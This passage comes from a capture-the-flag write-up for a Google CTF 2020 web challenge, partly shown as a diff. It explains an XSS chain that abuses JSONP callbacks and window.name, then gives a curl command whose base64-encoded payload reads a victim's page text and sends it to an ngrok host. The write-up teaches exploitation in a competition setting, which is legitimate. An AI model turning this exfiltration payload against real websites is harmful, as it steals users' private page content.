zoeyg/public-write-ups/googlectf-2020/all-the-little-things.md

 In order, this payload should overwrite the contents of the `<nav>` element on the page with our arbitrary HTML containing the two additional callback executions.
 The first grabs the `innerText` of the whole page, and places it in our concatenation `<div>`.
 The second callback retrieves the
 `innerText` of the `concat` form which should be our URL plus the text of the page, and then sets the browser location to make the request.
 We should then be able to grab the contents of the page by looking at the request sent to our local http server.
 Testing it on our own browser, we find that it works.
-It sometimes fails due to the script loading order, but succeeds most of the time.
+It sometimes fails due to the response times from the server and the script loading order, but succeeds most of the time.

 ### Getting the note id

 Lets incorporate our payload into the exploit for the previous pasteurization challenge.
-We'll need to set `window.name` and then change the `location.href` value to the page we want the text of.
+We'll need to set `window.name`(since it persists across pages) and then change the `location.href` value to the `littlethings.web.ctfcompetition.com` page we want the text of.
 If you remember, certain characters are escaped, so lets base64 encode the JSON string.
 Don't forget to url encode as well.

 ```sh
 curl 'https://pasteurize.web.ctfcompetition.com/' --data-raw 'content[]=;window.name=atob(`eyJfX3Byb3RvX18iOiB7fSwidGhlbWUiOiB7ImNiIjogImRvY3VtZW50LmJvZHkuZmlyc3RFbGVtZW50Q2hpbGQuaW5uZXJIVE1MPXdpbmRvdy5uYW1lLnRvU3RyaW5nIn0sImltZyI6ICIvIiwicGF5bG9hZCI6IFsiPGZvcm0gaWQ9J2NvbmNhdCc%2BaHR0cHM6Ly8wYjc2NjBhMzUxNTQubmdyb2suaW8vPzxkaXY%2BPC9kaXY%2BPC9mb3JtPiIsIjxpZnJhbWUgc3JjZG9jPSc8c2NyaXB0IHNyYz0vdGhlbWU%2FY2I9d2luZG93LnRvcC5jb25jYXQuZmlyc3RFbGVtZW50Q2hpbGQuaW5uZXJUZXh0PXdpbmRvdy50b3AuZG9jdW1lbnQuYm9keS5pbm5lclRleHQudG9TdHJpbmc%2BPC9zY3JpcHQ%2BJz48L2lmcmFtZT4iLCI8aWZyYW1lIHNyY2RvYz0nPHNjcmlwdCBzcmM9L3RoZW1lP2NiPXdpbmRvdy50b3AubG9jYXRpb24uaHJlZj13aW5kb3cudG9wLmNvbmNhdC5pbm5lclRleHQudG9TdHJpbmc%2BPC9zY3JpcHQ%2BJz48L2lmcmFtZT4iXX0%3D`);debugger;if(!window.skipIt)location.href=`https://littlethings.web.ctfcompetition.com/note?__debug__`;//'